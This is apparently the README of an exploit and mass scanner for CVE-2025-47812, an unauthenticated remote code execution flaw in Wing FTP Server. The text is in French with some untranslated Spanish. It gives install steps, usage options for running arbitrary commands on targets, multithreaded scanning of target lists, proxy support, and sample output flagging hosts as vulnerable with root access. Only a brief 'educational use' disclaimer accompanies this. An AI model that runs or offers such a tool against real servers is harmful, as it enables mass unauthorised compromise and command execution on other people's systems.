
Exploit et scanner pour CVE-2025-47812 ciblant l'exécution de code à distance non authentifiée sur Wing FTP Server, prenant en charge le ciblage unique, le scan de masse, le proxy et plusieurs formats de sortie.
Exploit amélioré pour Wing FTP Server CVE-2025-47812 - Exécution de code à distance non authentifiée (RCE)
Clonez ce dépôt et entrez dans le répertoire :
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
Ou téléchargez simplement le script CVE-2025-47812.py et exécutez-le.
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit pour Wing FTP Server CVE-2025-47812 - version améliorée
opciones:
-h, --help affiche ce message
-u URL, --url URL URL cible (ex. http://192.168.1.100:5466)
-f FILE, --file FILE fichier avec liste d'URLs (une par ligne)
-c COMMAND, --command COMMAND
commande à exécuter (par défaut: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
nom d'utilisateur (défaut: anonymous)
-P PASSWORD, --password PASSWORD
mot de passe (défaut: vide)
--check mode vérification : vérifie seulement si vulnérable (utilise commande inoffensive)
-v, --verbose mode verbose (affiche les détails)
--proxy PROXY proxy (ex. http://127.0.0.1:8080)
--timeout TIMEOUT timeout en secondes (défaut: 10)
-o OUTPUT, --output OUTPUT
fichier de sortie pour enregistrer les résultats
--output-format {txt,json,csv}
format de sortie (défaut: txt)
--threads THREADS nombre de threads pour scanner plusieurs cibles (défaut: 5)
--no-progress masquer la barre de progression
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
Le fichier doit contenir une URL par ligne, par exemple :
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
http://192.168.1.10:5466 - VULNERABLE - usuario: root
http://192.168.1.11:5466 - SEGURO - No vulnerable
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "usuario: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuario: root
Cet exploit est conçu uniquement à des fins éducatives et pour des tests de sécurité autorisés. L'utilisation non autorisée de cet outil contre des systèmes sans consentement explicite est illégale et peut entraîner de graves conséquences juridiques. Les auteurs déclinent toute responsabilité en cas de mauvaise utilisation.
Auteur original : Sheikh Mohammad Hasan (4m3rr0r) – Découverte et exploit de base. Améliorations et refactorisation : 0xJuarez – Ajout de fonctionnalités de scan massif, couleurs, support des proxys, multiples formats de sortie, et améliorations d'ergonomie.
Si vous aimez ce travail, n'oubliez pas de lui donner une étoile ⭐ sur GitHub !
Ce projet est sous licence MIT – voir le fichier LICENSE pour plus de détails.